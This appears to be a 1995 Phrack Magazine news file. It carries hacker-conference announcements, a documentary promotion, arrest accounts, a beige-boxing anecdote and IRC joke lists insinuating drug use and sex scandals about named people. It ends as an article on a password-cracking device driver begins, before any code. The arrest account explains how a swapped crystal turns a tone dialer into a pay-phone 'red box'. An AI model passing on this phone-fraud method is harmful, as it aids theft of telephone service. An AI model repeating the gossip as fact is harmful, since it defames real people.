mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1746 lines
No EOL
56 KiB
Text
1746 lines
No EOL
56 KiB
Text
==Phrack Magazine==
|
||
|
||
Volume Six, Issue Forty-Seven, File 3 of 22
|
||
|
||
|
||
// // /\ // ====
|
||
// // //\\ // ====
|
||
==== // // \\/ ====
|
||
|
||
/\ // // \\ // /=== ====
|
||
//\\ // // // // \=\ ====
|
||
// \\/ \\ // // ===/ ====
|
||
|
||
PART I
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
-----BEGIN PGP SIGNED MESSAGE-----
|
||
|
||
|
||
|
||
|
||
Phrack Magazine and Computer Security Technologies proudly present:
|
||
|
||
The 1995 Summer Security Conference
|
||
|
||
SSSS U U M M M M EEEEE RRRR CCCC OOOO N N
|
||
S U U MM MM MM MM E R R C O O NN N
|
||
SSS U U M M M M M M M M EEE RRRR C O O N N N
|
||
S U U M M M M M M E R R C O O N NN
|
||
SSSS UUUU M M M M EEEEE R R CCCC OOOO N N
|
||
|
||
"SUMMERCON"
|
||
|
||
June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
|
||
|
||
This is the official announcement and open invitation to the 1995
|
||
incarnation of Summercon. In the past, Summercon was an invite-only
|
||
hacker gathering held annually in St. Louis, Missouri. Starting
|
||
with this incarnation, Summercon is open to any and all interested
|
||
parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
|
||
Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
|
||
Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
|
||
Programmers, Conspiracy Nuts, Musicians and Nudists.
|
||
|
||
LOCATION:
|
||
|
||
The Clarion Hotel is located in downtown Atlanta, 9 miles from
|
||
Hartsfield International Airport and just a few blocks from the
|
||
Peachtree Center MARTA Station.
|
||
|
||
|
||
Considering the exorbitant expenses involved with attending other
|
||
conferences of this type, Rooms at Summercon are reduced to
|
||
|
||
$65 per night for Single or Double Occupancy
|
||
|
||
The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
|
||
Atlanta, GA 30303
|
||
(404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax)
|
||
|
||
|
||
No one likes to pay a hundred dollars a night. We don't expect you
|
||
to have to. Spend your money on room service, drinks in the hotel bar,
|
||
or on k-rad hacker t-shirts. Remember: Mention that you are attending
|
||
Summercon in order to receive the discount.
|
||
|
||
DIRECTIONS
|
||
|
||
75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland
|
||
then turn left on Houston (John Wesley Dobbs Ave.)
|
||
20 East - Exit 75/85 North at International. Turn Left on Courtland at
|
||
Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
|
||
20 West - Exit 75/85 North at International. One block to Courtland
|
||
and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
|
||
|
||
Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
|
||
International Airport will drop you off at many hotels in the downtown
|
||
area, including the Clarion. The shuttle should be no more than 12
|
||
dollars. Fares may be paid at the Airport Shuttle in the Ground
|
||
Transportation area of the Airport Terminal.
|
||
|
||
MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
|
||
convenient and inexpensive way to negotiate most of the Atlanta area.
|
||
Take the MARTA train from the Airport to the Peach Tree Center Station.
|
||
Walk three blocks down Houston to the intersection of Houston and
|
||
Courtland. The MARTA fare will be roughly 2 dollars.
|
||
|
||
Taxis - The average cab fare from Atlanta's Airport to the downtown area
|
||
is roughly 30 dollars.
|
||
|
||
CONFERENCE INFO
|
||
|
||
It has always been our contention that cons are for socializing.
|
||
"Seekret Hacker InPh0" is never really discussed except in private
|
||
circles, so the only way anyone is going to get any is to meet new people
|
||
and take the initiative to start interesting conversations.
|
||
|
||
Because of this, the formal speaking portion of Summercon will be
|
||
held on one day, not two or three, leaving plenty of time for people
|
||
to explore the city, compare hacking techniques, or go trashing and
|
||
clubbing with their heretofore unseen online companions.
|
||
|
||
The "Conference" will be held on June 3rd from roughly 11:00 am until
|
||
6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
|
||
|
||
NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping
|
||
and still photography will be permitted.
|
||
|
||
|
||
CURRENT LIST OF SPEAKERS:
|
||
|
||
Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source
|
||
Solutions (a private sector intelligence firm)
|
||
|
||
Topic: Hackers from the Intelligence Perspective
|
||
|
||
Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise",
|
||
Publisher of Security Insider Report, and noted security
|
||
expert
|
||
|
||
Topic: Electromagnetic Weaponry
|
||
|
||
Bob Stratton - Information Security Expert from one of America's largest
|
||
Internet service providers
|
||
|
||
Topic: The Future of TCP/IP Security
|
||
|
||
Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"
|
||
|
||
Topic: Cryptography, Banking, and Commerce
|
||
|
||
Annaliza Savage - London-based Director/Producer
|
||
|
||
Topic: Discussion of her documentary "Unauthorized Access"
|
||
(Followed by a public screening of the film)
|
||
|
||
Chris Goggans - Editor of Phrack Magazine and Summercon M.C.
|
||
|
||
Topic: introductions, incidentals and a topic which is sure
|
||
to culminate in an international incident.
|
||
|
||
|
||
(Other Speakers May Be Added - Interested parties may contact scon@fc.net)
|
||
|
||
COSTS
|
||
|
||
Since other cons of this type have been charging from 25 to 40 dollars
|
||
entry fees, we are only charging 10 dollars. Yes, that's correct,
|
||
TEN (10) dollars in US currency. Money is far too scarce among the
|
||
hacker community to fleece everyone for money they will probably need
|
||
to eat with or pay for their hotel rooms.
|
||
|
||
|
||
WHAT TO DO IN ATLANTA:
|
||
|
||
To attempt to make everyone's stay in Atlanta more exciting, we are
|
||
contacting local establishments to arrange for special discounts and/or
|
||
price reductions for Summercon attendees. Information will be handed
|
||
out regarding these arrangements at the conference.
|
||
|
||
Atlanta is a happening town.
|
||
|
||
Touristy Stuff Party Time
|
||
|
||
The World of Coca-Cola Buckhead
|
||
Underground Atlanta The Gold Club
|
||
Georgia Dome (Baseball?) (Countless Other Clubs and Bars)
|
||
Six Flags
|
||
|
||
CONTACTING SUMMERCON SPONSORS
|
||
|
||
You can contact the Summercon sponsors by several means:
|
||
|
||
E-mail: scon@fc.net
|
||
|
||
WWW: http://www.fc.net/scon.html
|
||
|
||
Snail Mail: Phrack Magazine
|
||
603 W. 13th #1A-278
|
||
Austin, TX 78701
|
||
|
||
|
||
If deemed severely urgent, you can PGP your email with the following PGP
|
||
key:
|
||
|
||
- -----BEGIN PGP PUBLIC KEY BLOCK-----
|
||
Version: 2.6
|
||
|
||
mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
|
||
Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
|
||
Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
|
||
tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
|
||
=evjv
|
||
- -----END PGP PUBLIC KEY BLOCK-----
|
||
|
||
|
||
See you in Atlanta!
|
||
|
||
|
||
|
||
|
||
-----BEGIN PGP SIGNATURE-----
|
||
Version: 2.6
|
||
|
||
iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4
|
||
46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q
|
||
mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5
|
||
uRix2FrftCY=
|
||
=m/Yt
|
||
-----END PGP SIGNATURE-----
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
UNAUTHORIZED ACCESS
|
||
|
||
"Unauthorized Access [is] a documentary that tells the story of the
|
||
computer underground from our side, it captures the hacker world
|
||
from Hamburg to Los Angeles and virtually everywhere in between."
|
||
2600 The Hacker Quarterly
|
||
|
||
Computers are becoming an integral part of our everyday existence.
|
||
They are used to store and send a multitude of information, from
|
||
credit reports and bank withdrawals, to personal letters and highly
|
||
sensitive military documents. So how secure are our computer
|
||
systems?
|
||
|
||
The computer hacker is an expert at infiltrating secured systems,
|
||
such as those at AT&T, TRW, NASA or the DMV. Most computer systems
|
||
that have a telephone connection have been under siege at one time
|
||
or another, many without their owner's knowledge. The really good
|
||
hackers can reroute the telephone systems, obtain highly sensitive
|
||
corporate and government documents, download individual's credit
|
||
reports, make free phone calls globally, read private electronic
|
||
mail and corporate bulletins and get away without ever leaving a
|
||
trace.
|
||
|
||
So who are these hackers? Just exactly WHAT do they do and WHY do
|
||
they do it? Are they really a threat? What do they DO with the
|
||
information that they obtain? What are the consequences of their
|
||
actions? Are hackers simply playing an intellectual game of chess
|
||
or are hackers using technology to fight back and take control of
|
||
a bureaucratic system that has previously appeared indestructible?
|
||
|
||
Unauthorized Access is a documentary that demistifies the hype and
|
||
propaganda surrounding the computer hacker. Shot in 15 cities
|
||
and 4 countries, the film hopes to expose the truths of this subculture
|
||
focusing on the hackers themselves.
|
||
|
||
Unauthorized Access is a view from inside the global underground.
|
||
|
||
For a PAL (European) copy send a cheque/postal order for 15 British
|
||
Pounds or $25 for NTSC (American) standard to:
|
||
|
||
Savage Productions
|
||
Suite One
|
||
281 City Road
|
||
London EC1V 1LA
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
ACCESS ALL AREAS
|
||
Hacking Conference
|
||
|
||
1st - 2nd July, 1995
|
||
(Saturday & Sunday)
|
||
King's College, London, UK
|
||
|
||
|
||
-------------------------------WHAT-IT-IS---------------------------------
|
||
|
||
The first UK hacking conference, Access All Areas, is to be run in London
|
||
later this year. It is aimed at hackers, phone phreaks, computer security
|
||
professionals, cyberpunks, law enforcement officials, net surfers,
|
||
programmers, and the computer underground.
|
||
|
||
It will be a chance for all sides of the computer world to get together,
|
||
discuss major issues, learn new tricks, educate others and meet "The
|
||
Enemy".
|
||
|
||
|
||
|
||
-------------------------------WHERE-IT-IS--------------------------------
|
||
|
||
Access All Areas is to be held during the first weekend of July, 1995 at
|
||
King's College, London. King's College is located in central London on
|
||
The Strand and is one of the premier universities in England.
|
||
|
||
|
||
|
||
-----------------------------WHAT-WILL-HAPPEN-----------------------------
|
||
|
||
There will be a large lecture theatre that will be used for talks by
|
||
computer security professionals, legal experts and hackers alike. The
|
||
topics under discussion will include hacking, phreaking, big brother and
|
||
the secret services, biometrics, cellular telephones, pagers, magstrips,
|
||
smart card technology, social engineering, Unix security risks, viruses,
|
||
legal aspects and much, much more.
|
||
|
||
Technical workshops will be running throughout the conference on several
|
||
topics listed above.
|
||
|
||
A video room, equipped with multiple large screen televisions, will be
|
||
showing various films, documentaries and other hacker related footage.
|
||
|
||
The conference facilities will also include a 10Mbps Internet link
|
||
connected to a local area network with various computers hanging off of it
|
||
and with extra ports to connect your laptop to.
|
||
|
||
|
||
|
||
------------------------------REGISTRATION--------------------------------
|
||
|
||
Registration will take place on the morning of Saturday 1st July from
|
||
9:00am until 12:00 noon, when the conference will commence. Lectures and
|
||
workshops will run until late Saturday night and will continue on Sunday
|
||
2nd July from 9:00am until 6:00pm.
|
||
|
||
|
||
|
||
----------------------------------COST------------------------------------
|
||
|
||
The price of admission will be 25.00 British pounds (approximately US $40.00)
|
||
at the door and will include a door pass and conference programme.
|
||
|
||
|
||
|
||
-----------------------------ACCOMMODATION--------------------------------
|
||
|
||
Accommodation in university halls of residence is being offered for the
|
||
duration of the conference. All prices quoted are per person, per night
|
||
and include full English breakfast. (In British pounds)
|
||
|
||
|
||
SINGLE TWIN
|
||
WELLINGTON HALL 22.00 16.75
|
||
|
||
|
||
Special prices for British and Overseas university students, holding
|
||
current student identification, are also available - please call King's
|
||
Campus Vacation Bureau for details.
|
||
|
||
All bookings must be made directly with the university. They accept
|
||
payment by cash, cheque and credit card.
|
||
|
||
To making a booking call the following numbers...
|
||
|
||
|
||
KING'S CAMPUS VACATION BUREAU
|
||
|
||
Telephone : +44 (0)171 351 6011
|
||
Fax : +44 (0)171 352 7376
|
||
|
||
|
||
|
||
----------------------------MORE-INFORMATION------------------------------
|
||
|
||
If you would like more information about Access All Areas, including
|
||
pre-registration details then please contact one of the following...
|
||
|
||
|
||
Telephone : +44 (0)973 500202
|
||
Fax : +44 (0)181 224 0547
|
||
Email : info@phate.demon.co.uk
|
||
|
||
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
D I S T R I B U T E W I D E L Y
|
||
|
||
*****FIRST CALL FOR PAPERS*****
|
||
|
||
InfoWarCon '95
|
||
|
||
A 2 Day International Symposium
|
||
on Information Warfare
|
||
|
||
September 7-8, 1995
|
||
Stouffer Concourse Hotel
|
||
Arlington, VA
|
||
|
||
Presented by:
|
||
National Computer Security Association
|
||
Winn Schwartau and Interpact, Inc.
|
||
Robert Steele and OSS, Inc.
|
||
|
||
|
||
CONFERENCE OVERVIEW:
|
||
|
||
The Information Warfare Conference (InfoWarCon) is our third
|
||
international conference dedicated to the exchange of ideas,
|
||
policies, tactics, weapons, methodologies and defensive posture
|
||
of Information Warfare on a local, national, and global basis.
|
||
|
||
InfoWarCon will bring together international experts from a broad
|
||
range of disciplines to discuss and integrate concepts in this
|
||
rapidly evolving field. Attendees will intensely interact with
|
||
the speakers and presenters as well as each other to increase
|
||
each other's understanding of the interrelatedness of the topics.
|
||
|
||
While there are many interpretations of Information Warfare by
|
||
different groups, the current working definition we employ is:
|
||
|
||
Information Warfare is the use of information and informa
|
||
tion systems as weapons in a conflict where information and
|
||
information systems are the targets.
|
||
|
||
Information Warfare is broken down into three categories, and
|
||
InfoWarCon speakers and attendees will interactively examine them
|
||
all:
|
||
|
||
Class I: Personal Privacy. "In Cyberspace You Are Guilty
|
||
Until Proven Innocent." The mass psychology of information.
|
||
Privacy versus stability and law enforcement.
|
||
|
||
Class II: Industrial and Economic Espionage. Domestic and
|
||
international ramifications and postures in a globally
|
||
networked, competitive society.
|
||
|
||
Class III: Global Information Warfare. Nation-state versus
|
||
Nation-state as an alternative to convention warfare, the
|
||
military perspective and terrorism.
|
||
|
||
THE CONFERENCE
|
||
|
||
The conference is designed to be interactive - with extensive
|
||
interaction between all participants. The preliminary contents
|
||
and discussions will focus on:
|
||
|
||
- What is Information Warfare?
|
||
- What Are the Targets?
|
||
- Protecting the Global Financial Infrastructure
|
||
- Military Perspectives on InfoWar
|
||
- InfoWar Vs. Non-Lethal Warfare
|
||
- Defending the U.S. Infrastructure
|
||
- The Intelligence Community and Information
|
||
- Open Source Intelligence
|
||
- The Psychology of Information
|
||
- Privacy Balances
|
||
- Information As the Competitive Edge
|
||
- International Cooperation
|
||
- Denial of Service
|
||
- Cyber-Terrorism
|
||
- Offensive Terrorism
|
||
- Offensive InfoWar Techniques
|
||
- Defensive InfoWar Postures
|
||
- Education and Awareness Training
|
||
- Corporate Policy
|
||
- Government Policy
|
||
- Global Policy
|
||
- Espionage
|
||
- Export Controls of Information Flow
|
||
- The Legal Perspective
|
||
- The New Information Warriors
|
||
|
||
Plenary sessions will accommodate all attendees, while break-out
|
||
sessions will provide more intimate presentations and interactiv
|
||
ity on topics of specific interests.
|
||
|
||
SUBMISSIONS:
|
||
|
||
Submission for papers are now be accepted. We are looking for
|
||
excellent speakers and presenters with new and novel concepts of
|
||
Information Warfare. You may submit papers on the topics listed
|
||
above, or on others of interest to you, your company or govern
|
||
ment.
|
||
|
||
We welcome innovative thought from the private sector, the gov
|
||
ernment (civilian, military and intelligence) and the interna
|
||
tional community. Submissions must be received by May 1, 1995,
|
||
and notification of acceptance will occur by June 1, 1995.
|
||
Please submit 2-3 page presentation outlines to:
|
||
|
||
winn@infowar.com.
|
||
|
||
All submissions and the contents of InfoWarCon '95 will be in
|
||
English. If you must submit a hard copy: Fax: 813.393.6361 or
|
||
snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL
|
||
34642
|
||
|
||
All submissions and presentation should be unclassified, as they
|
||
will become Open Source upon submission and/or acceptance.
|
||
|
||
SPONSORS:
|
||
|
||
The Information Warfare Symposium is currently choosing sponsors
|
||
for various functions.
|
||
|
||
Continental Breakfast, Day 1 and Day 2
|
||
Morning Coffee Break, Day 1 and Day 2
|
||
Lunch, Day 1 and Day 2
|
||
Afternoon Coffee Break, Day 1 and Day 2
|
||
Cocktail Party, Day 1
|
||
|
||
Each Corporate or Organizational sponsor will be included in all
|
||
promotional materials and Symposium function. For more infor-
|
||
mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or
|
||
email: 747774.1326@Compuserve.com.
|
||
|
||
EXHIBITS:
|
||
|
||
Limited space is available for table-top displays for commercial
|
||
or governmental products, services, educational or other promo
|
||
tion. For further information, contact Paul Gates at the National
|
||
Computer Security Association. 717.258.1816
|
||
|
||
REGISTRATION:
|
||
|
||
Payment made BEFORE July 1, 1995:
|
||
|
||
( ) $445.00 NCSA Member/OSS Attendee
|
||
( ) $545.00 All others
|
||
|
||
Payment made AFTER July 1, 1995:
|
||
|
||
( ) $495.00 NCSA Members/OSS Attendees
|
||
( ) $595.00 All others
|
||
|
||
( ) I'M INTERESTED, but would like more information sent to the
|
||
address above. Please include a free copy of your 32 page
|
||
"Information Security Resource Catalog".
|
||
|
||
( ) I'd like to know more about NCSA on-site training, security
|
||
audits and consulting services. Please have someone give me
|
||
a call.
|
||
|
||
MAIL OR FAX TO:
|
||
|
||
National Computer Security Association
|
||
10 South Courthouse Avenue
|
||
Carlisle, PA 17013
|
||
Phone 717-258-1816 or FAX 717-243-8642
|
||
EMAIL: 74774.1326@compuserve.com
|
||
CompuServe: GO NCSAFORUM
|
||
|
||
Winn Schwartau Interpact, Inc.
|
||
Information Security & Warfare
|
||
V:813.393.6600 F:813.393.6361
|
||
Email: Winn@Infowar.Com
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
|
||
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
|
||
of a device to commit Telecommunications fraud charges. He is being held in
|
||
Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
|
||
|
||
On the evening of the 13th Bernie S. received a page from his mail drop.
|
||
Some people he knew from Florida had stopped in at his mail drop thinking
|
||
it was his address. They were looking to purchase several 6.5 Mhz Crystals.
|
||
These crystals when used to replace the standard crystal in the RADIO SHACK
|
||
Hand Telephone dialer, and with some programming, produce tones that trick
|
||
pay phones into believing they have received coins. These are commonly
|
||
referred to as "red boxes" and got their name from an actual red box pulled
|
||
from a pay phone in the late seventies by some curious person.
|
||
|
||
Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
|
||
to sell the widely used electronic timing crystals for roughly $4 a piece.
|
||
The purchaser only had two twenty dollar bills and Ed Cummings no change.
|
||
Ed Cummings went into the 7-11 to get some change to make the transaction.
|
||
A police officer noticed a van parked in the parking lot of the 7-11 with
|
||
more several African Americans inside. As Ed was leaving the 7-11 he noticed
|
||
fifteen police cars pulling into the parking lot of the 7-11.
|
||
|
||
Next thing he knew the police were asking him if they could `rifle`
|
||
through his car. He said no. Moments later as he was talking to a Detective
|
||
and noticed another police officer going through his car. He asked the officer
|
||
to stop. They did not, in all the police confiscated a few hundred 6.5Mhz
|
||
crystals (which he resells for roughly $4 a piece) and a large box of 100
|
||
dialers. The police told him they would get back to him, and he could have
|
||
his electronics back if the contents of the bag were legal. In the contents
|
||
of the seized items was one modified dialer, that a customer returned after
|
||
modification explaining that it did not work, a broken red box.
|
||
|
||
The next day Ed `Bernie S.` Cummings was over at a friend`s house working
|
||
on their computer when eight to ten plain clothed armed men burst into the
|
||
house and ordered him and his friends to freeze. They cuffed him and took him
|
||
to a holding cell (what jail?). There he was left without a blanket or jacket
|
||
to sleep with in the cold cell.
|
||
|
||
That evening the Secret Service had been called in when someone figured
|
||
out what the dialers and crystals would do when put together. The
|
||
United States Secret Service found his home and entered it, while they were
|
||
questioning him.
|
||
|
||
The next morning at his arraignment he was finally told of the charges
|
||
he was being held upon. They were Two misdemeanor Charges of manufacture,
|
||
Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
|
||
use of a computer charges. His bail was automatically set to $100,000.00
|
||
because Ed Cummings refused talk with the police without his attorney present.
|
||
|
||
The Secret Service presented to the judge a 9 page inventory of what
|
||
they had found in his home. On that inventory there 14 computers. 2 printers.
|
||
more Boxes of bios chips for the systems he worked with. Eprom burners which
|
||
the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
|
||
Eproms are used in everything from Automobile computers to personal computers.
|
||
They also confiscated his toolbox of screw drivers, wire clippers and other
|
||
computer oriented tools he used for his consulting job.
|
||
|
||
The Judge dropped the Two unlawful use of a computer charges due to
|
||
the fact that the evidence was circumstantial and the county had no actual
|
||
evidence that Ed had ever used the computers in question.
|
||
|
||
As of 3/27/1995 Ed Cummings is still in Delaware County Prison
|
||
awaiting his trial. His trial has not yet been scheduled and Ed will most
|
||
likely not raise the One Hundred Thousand Dollars needed to be released on
|
||
bail.
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
"Don't believe the hype." - Public Enemy, 1988
|
||
|
||
This file's purpose is to clear up any misconceptions about the recent
|
||
situation that has come upon the sociopolitical group known as KoV.
|
||
|
||
As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
|
||
ANYTHING. We have received several tip-offs from private sources regarding
|
||
a supposed "FBI investigation" of our group that is purported to be active
|
||
at this very minute. However, with the exception of a few VERY suspicious
|
||
incidents and coincidences, there has been NO HARD EVIDENCE thus far about
|
||
ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
|
||
the integrity of our innocence, we must stress that nothing has gone down.
|
||
|
||
Yet.
|
||
|
||
We have very good reason to believe that a few of those among us are about
|
||
to be charged with various false accusations by a local university. However
|
||
the current mental state of the person in charge of this charade is also in
|
||
question. Therefore it would be logical to assume nothing. The conflicting
|
||
tip-offs, rumors, warnings and threats that we have received make it even
|
||
more difficult to get a clear picture of exactly what is going on. We have
|
||
heard so many things from so many different sources, both credible and
|
||
questionable, that we would be hard-pressed to give an accurate evaluation
|
||
of the current state of things.
|
||
|
||
What we can say for sure, however, is that KoV officially died on Monday,
|
||
January 23, 1995, along with its communications network, KoVNet. This
|
||
promises to be a great loss to the open-minded and sociopolitical community
|
||
as well as the free-thinkers and activists who supported us so generously.
|
||
Our reasons for disbanding the group were many, but the foremost was in
|
||
light of the current situation we are facing.
|
||
|
||
Consider this last obstacle our final, stalwart stand against the evils of
|
||
AmeriKKKan government and its various greedy, capitalistic agencies.
|
||
From the moment of KoV's conception, they have publicly sought to destroy
|
||
us; to silence our questioning of authority, to oppress our free-thinking
|
||
minds, and to close off our intellectual channels of communication. They
|
||
have even gone so far as to stalk us in public places. 'Tis a shame indeed.
|
||
|
||
If you have any questions or if you wish to contact us for any reason,
|
||
you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
|
||
I will try to post further updates of this saga to CiPNet, ThrashNet,
|
||
QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
|
||
We would appreciate any support that other h/p, art or political groups can
|
||
lend us. Until then, my friends...
|
||
|
||
-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
What happens when you are caught beige boxing.
|
||
|
||
by Rush 2
|
||
|
||
|
||
Yeah yeah, I'm the only one. But here is a generally interesting
|
||
description of everything to getting caught to arraignment.
|
||
|
||
Well about 5 months ago i needed to set up a conference really quick..
|
||
it was about 12:00 (never knew there was a 10:00 pm curfew in that area)
|
||
and went to a 25 pair box at this local strip mall. Well I was out there
|
||
the box was already open and I was just about to start testing pairs to
|
||
see which was connected and what wasn't.
|
||
|
||
All of a sudden, i hear this loud screeching sound of a car coming
|
||
to a skid from doing about 90mph. I turned and saw that typically dirty
|
||
squad car about to hit me.. you know the car, mud and dust on the tires
|
||
and body, coffee and smudge marks all over the windshield. i got on my
|
||
bike and started to run. Now the thing is I COULD have gotten away.. the
|
||
pathetic excuse for a cop had run not more than 10 yards after me and
|
||
decided that I was a threat so he pulled his handgun and yelled. I saw
|
||
this and thought it would be wiser to stop than get shot.
|
||
|
||
Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
|
||
not know i was less than a half mile from a police station and they were
|
||
looking for a prowler in the general area. The police did the normal,
|
||
called me scum, asked me what i was doing, searched me until they were
|
||
satisfied... than picked me up and threw me in the car... the funny
|
||
thing was they didn't see my phone until they threw me into the back seat
|
||
and the cord fell out.. (they never saw the page of notes and 'naughty'
|
||
material in my pocket though it was about 4 inches thick and sticking out
|
||
that a blind man could see it.
|
||
|
||
Well they got me to the station and pried my info out, and called my
|
||
father... I came up with a good enough story about some made up user
|
||
who told me to go across the street and plug in.. then I was told I
|
||
would be dealt with in the next week... I did not receive anything for
|
||
three and a half months.
|
||
|
||
Once the time came for the arraignment (for a juvenile they called it
|
||
an intake). I got to go to the police station, sit for about 3 hours (as
|
||
if i thought they would be on time) until I waited for my probation
|
||
officer. Finally she got there and we proceeded to talk. She explained
|
||
all of the charges and my lawyer (interesting guy) laughed, I was being
|
||
charged with prowling (could be disputed I was on a public sidewalk and
|
||
there in that strip mall is a 24 hr laundry mat), loitering (again that
|
||
could be disputed), and attempted theft of services (though I NEVER even
|
||
plugged in).
|
||
|
||
After this was all said i spent the next hour talking with the lady
|
||
in private. I immediately found she had an interest in computers and was
|
||
having a problem with her home pc. So I easily changed the topic to my
|
||
fascination in computers and solved her problem with her computer, and
|
||
answered at least 50 questions about them. In the last 10-15 minutes of
|
||
the conversation all i could get from her were statements about how
|
||
impressed and how intrigued she was with me. She ended up giving me a
|
||
look (that was hard to judge but i am staying away from this chick) that
|
||
was either confusion or attraction, slipped me a card with her home phone
|
||
number and name and called back in my lawyer and parents.
|
||
|
||
Once they got back in, all that she really said was I was a great boy,
|
||
that she would like to see me do more with my time besides computers, and
|
||
that she was taking my sentence of 12 months formal probation with 300
|
||
hours of community service to 3 months of informal probation with 30
|
||
hours of community service. That and she said bell was asking her what
|
||
to do and she would tell them that it was a non issue since I did not
|
||
plug in and even if I had it would not be their concern unless I had
|
||
plugged in to the telco access part of the network interface.
|
||
|
||
Well I have yet to receive official record of having to perform
|
||
the community service or the probation but I called my probation officer
|
||
yesterday and said she wasn't putting the community service into the
|
||
punishment and it has been an equivalent amount of time to just say that
|
||
since I haven't gotten in trouble since she will count the probation as
|
||
already served. Luckily she based all other needs of me on the report
|
||
from a teacher, and with my luck she picked the one teacher, my computers
|
||
teacher, that no matter what I did or said would lie and say I didn't.
|
||
|
||
|
||
Thanks to erikb for publishing this, and greets to CXrank, paradox,
|
||
dark phiber, the fat cop (who spilled his coffee and box of donuts
|
||
coming after me) that made this all possible, and to everyone else.
|
||
|
||
|
||
-rush 2
|
||
http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html
|
||
|
||
|
||
Look for My site, unforeseen danger soon to be on a 28.8 slip
|
||
and by the end of the summer on a 500k slip connect.
|
||
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
[Something found on IRC]
|
||
|
||
Danny Partridge Emmanuel Goldstein
|
||
(AKA Danny Bonaduce: (AKA Eric Corley:
|
||
a child star from the child-like publisher
|
||
"The Partridge Family" of 26oo magazine.
|
||
---------------------- ------------------
|
||
|
||
Hosts a boring local Hosts a boring local
|
||
radio program. radio program.
|
||
|
||
Quasi Celebrity Quasi Celebrity
|
||
Status among Status among
|
||
70's freaks telephone phreaks
|
||
|
||
Periods of Heavy Periods of Heavy
|
||
Drug Usage Drug Usage
|
||
|
||
Involved in Sex Involved in Sex
|
||
Scandal with Scandal with
|
||
another man another man
|
||
|
||
Last name is Friends with Phiber
|
||
"Bonaduce" Optik whose first
|
||
handle was "Il Duce"
|
||
|
||
Supplements incoming Supplements incoming
|
||
by doing desperate by doing desperate
|
||
local talk shows local talk shows
|
||
whenever he can. whenever he can.
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
Top 10 #hack fights that would be the coolest to see.
|
||
(And no, Ophie's not in it twice just because she's a girl...)
|
||
===========================================================================
|
||
|
||
10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
|
||
featuring KL & TK.
|
||
|
||
9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
|
||
one after that... or, uh...
|
||
|
||
8.) C-Curve and Elite Entity, "Who's who?"
|
||
|
||
7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
|
||
(Or: "I'm totally numb, let me hug you!!!")
|
||
|
||
6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
|
||
|
||
5.) Grayarea vs. Netcom "No, *I* want root..."
|
||
|
||
4.) WWF Wrestling with Len and |al|.
|
||
|
||
3.) Ophie vs. Voyager, "Night of the Living Dead."
|
||
|
||
2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
|
||
and the number one #hack fight is
|
||
|
||
1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
|
||
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit
|
||
+++++++++++++++++++++++++++++++++++++++++++++
|
||
|
||
The device driver code listed below provides a data stream of passwords.
|
||
The device driver approach was used to speed up the process
|
||
of cracking passwords on an incremental basis. The usual approach was
|
||
to generate the passwords to a file, then reading the file, etc..the device
|
||
driver approach circumvents these file storage problems, and others, such as
|
||
having enough free disk space and delays from disk i/o.
|
||
This driver operates completely in memory (approx. 0.5Kb)
|
||
|
||
How practical is this?
|
||
----------------------
|
||
